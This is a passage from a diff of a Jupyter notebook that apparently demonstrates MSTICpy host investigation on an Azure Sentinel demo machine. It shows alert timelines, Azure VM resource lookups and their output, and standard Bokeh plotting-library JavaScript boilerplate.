\":{\"data\":{\"AlertName\":[\"Suspicious Activity Detected\",\"Suspicious Activity Detected\",\"RDP Brute Force\"],\"TimeGenerated\":{\"__ndarray__\":\"AIBrHaIzd0IAgGsdojN3QgAAC4KgM3dC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[3]},\"index\":[0,1,2],\"y_index\":[0,0,0]},\"selected\":{\"id\":\"1800\"},\"selection_policy\":{\"id\":\"1801\"}},\"id\":\"1722\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1745\",\"type\":\"ResetTool\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1816\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1761\",\"type\":\"DataRange1d\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1747\",\"type\":\"PanTool\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1757\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1819\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"1722\"}},\"id\":\"1779\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1823\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1785\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1825\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1767\"},{\"id\":\"1772\"}],\"center\":[{\"id\":\"1770\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1778\"}],\"title\":{\"id\":\"1757\"},\"toolbar\":{\"id\":\"1771\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1759\"},\"x_scale\":{\"id\":\"1763\"},\"y_range\":{\"id\":\"1761\"},\"y_scale\":{\"id\":\"1765\"}},\"id\":\"1756\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1733\",\"type\":\"LinearScale\"},{\"attributes\":{\"formatter\":{\"id\":\"1773\"},\"ticker\":{\"id\":\"1768\"}},\"id\":\"1767\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1815\"},{\"id\":\"1816\"},{\"id\":\"1817\"},{\"id\":\"1818\"},{\"id\":\"1819\"},{\"id\":\"1820\"},{\"id\":\"1821\"},{\"id\":\"1822\"},{\"id\":\"1823\"},{\"id\":\"1824\"},{\"id\":\"1825\"},{\"id\":\"1826\"}]},\"id\":\"1768\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"end\":1594408415750.0002,\"start\":1594406225249.9998},\"id\":\"1759\",\"type\":\"Range1d\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1777\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1826\",\"type\":\"YearsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1820\",\"type\":\"DaysTicker\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1772\",\"type\":\"Title\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1723\"},{\"id\":\"1743\"},{\"id\":\"1744\"},{\"id\":\"1745\"},{\"id\":\"1746\"},{\"id\":\"1747\"}]},\"id\":\"1749\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1800\",\"type\":\"Selection\"},{\"attributes\":{\"fill_color\":{\"value\":\"navy\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1776\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"1767\"},\"ticker\":null},\"id\":\"1770\",\"type\":\"Grid\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1817\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1773\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1801\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1815\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1765\",\"type\":\"LinearScale\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1780\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1780\"}]},\"id\":\"1771\",\"type\":\"Toolbar\"},{\"attributes\":{\"data_source\":{\"id\":\"1722\"},\"glyph\":{\"id\":\"1776\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1777\"},\"selection_glyph\":null,\"view\":{\"id\":\"1779\"}},\"id\":\"1778\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1822\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1788\",\"type\":\"Diamond\"},{\"attributes\":{\"overlay\":{\"id\":\"1781\"},\"x_range\":{\"id\":\"1727\"},\"y_range\":null},\"id\":\"1780\",\"type\":\"RangeTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1748\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1796\",\"type\":\"BasicTickFormatter\"}],\"root_ids\":[\"1792\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n",
+       "  var render_items = [{\"docid\":\"a48f913b-f3db-443c-8fcd-e3ed1ebdc15d\",\"root_ids\":[\"1792\"],\"roots\":{\"1792\":\"37bbe05e-f10e-4d65-993b-069a382420a1\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1792"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Initalize our notebooklets\n",
+    "import msticnb as nb\n",
+    "from msticnb.common import TimeSpan\n",
+    "nb.init()\n",
+    "tspan = TimeSpan(start=start, end=end)\n",
+    "# Select our notebooklet\n",
+    "nblet = nb.nblts.azsent.host.HostSummary()\n",
+    "# Run our notebooklet\n",
+    "out = nblet.run(value=host_name, timespan=tspan)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Azure Data\n",
+    "As well as providing query providers to get data from SIEM solutions such as Azure Sentinel, MSTICpy also has the capability to acquire data from other sources such as the Azure APIs. Below we use [these features](https://msticpy.readthedocs.io/en/latest/data_acquisition/AzureData.html) to collect information and metrics on our host.<br>\n",
+    "We then use the MSTICpy interactive [timeline visualization](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) in order to display this data."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>resource_id</th>\n",
+       "      <th>name</th>\n",
+       "      <th>resource_type</th>\n",
+       "      <th>location</th>\n",
+       "      <th>tags</th>\n",
+       "      <th>plan</th>\n",
+       "      <th>properties</th>\n",
+       "      <th>kind</th>\n",
+       "      <th>managed_by</th>\n",
+       "      <th>sku</th>\n",
+       "      <th>identity</th>\n",
+       "      <th>state</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>295</th>\n",
+       "      <td>/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Micros...</td>\n",
+       "      <td>BlackHatDemoHost</td>\n",
+       "      <td>Microsoft.Compute/virtualMachines</td>\n",
+       "      <td>eastus</td>\n",
+       "      <td>{'Role': 'Demo'}</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                                                             resource_id  \\\n",
+       "295  /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Micros...   \n",
+       "\n",
+       "                 name                      resource_type location  \\\n",
+       "295  BlackHatDemoHost  Microsoft.Compute/virtualMachines   eastus   \n",
+       "\n",
+       "                 tags  plan properties  kind managed_by   sku identity state  \n",
+       "295  {'Role': 'Demo'}  None       None  None       None  None     None  None  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.data.azure_data import AzureData\n",
+    "# Initalize and connect to Azure\n",
+    "az = AzureData()\n",
+    "az.connect()\n",
+    "# Get details on our subscription and virtal machines\n",
+    "sub_id = az.get_subscriptions().iloc[0]['Subscription ID']\n",
+    "resources = az.get_resources(sub_id)\n",
+    "display(resources[resources['name'] == \"BlackHatDemoHost\"])\n",
+    "res_id = resources[resources['name'] == \"BlackHatDemoHost\"].iloc[0]['resource_id']"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'resource_id': '/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Compute/virtualMachines/BlackHatDemoHost',\n",
+       " 'name': 'BlackHatDemoHost',\n",
+       " 'resource_type': 'Microsoft.Compute/virtualMachines',\n",
+       " 'location': 'eastus',\n",
+       " 'tags': {'Role': 'Demo'},\n",
+       " 'plan': None,\n",
+       " 'properties': {'vmId': '3f2b6a14-4c02-41aa-a2e8-6859ee4c7847',\n",
+       "  'hardwareProfile': {'vmSize': 'Standard_B2s'},\n",
+       "  'storageProfile': {'imageReference': {'publisher': 'MicrosoftWindowsDesktop',\n",
+       "    'offer': 'Windows-10',\n",
+       "    'sku': 'rs5-pro',\n",
+       "    'version': 'latest',\n",
+       "    'exactVersion': '17763.1282.2006061952'},\n",
+       "   'osDisk': {'osType': 'Windows',\n",
+       "    'name': 'BlackHatDemoHost_OsDisk_1_dd1ef27d863e4e14ab3b446a4ab3ab20',\n",
+       "    'createOption': 'FromImage',\n",
+       "    'caching': 'ReadWrite',\n",
+       "    'managedDisk': {'id': '/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BLACKHATDEMO/providers/Microsoft.Compute/disks/BlackHatDemoHost_OsDisk_1_dd1ef27d863e4e14ab3b446a4ab3ab20'}},\n",
+       "   'dataDisks': []},\n",
+       "  'osProfile': {'computerName': 'BlackHatDemoHos',\n",
+       "   'adminUsername': 'mstic_admin',\n",
+       "   'windowsConfiguration': {'provisionVMAgent': True,\n",
+       "    'enableAutomaticUpdates': True,\n",
+       "    'patchSettings': {'patchMode': 'AutomaticByOS'}},\n",
+       "   'secrets': [],\n",
+       "   'allowExtensionOperations': True,\n",
+       "   'requireGuestProvisionSignal': True},\n",
+       "  'networkProfile': {'networkInterfaces': [{'id': '/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/BlackHatDemo/providers/Microsoft.Network/networkInterfaces/blackhatdemohost86'}]},\n",
+       "  'licenseType': 'Windows_Client',\n",
+       "  'provisioningState': 'Succeeded'},\n",
+       " 'kind': None,\n",
+       " 'managed_by': None,\n",
+       " 'sku': None,\n",
+       " 'identity': None,\n",
+       " 'state': <azure.mgmt.compute.v2019_12_01.models._models_py3.VirtualMachineInstanceView at 0x1b6bcf7b1c0>}"
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Get details on our target resource\n",
+    "az.get_resource_details(resource_id=res_id, sub_id=sub_id)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2865\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"2865\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"2865\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2865\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if 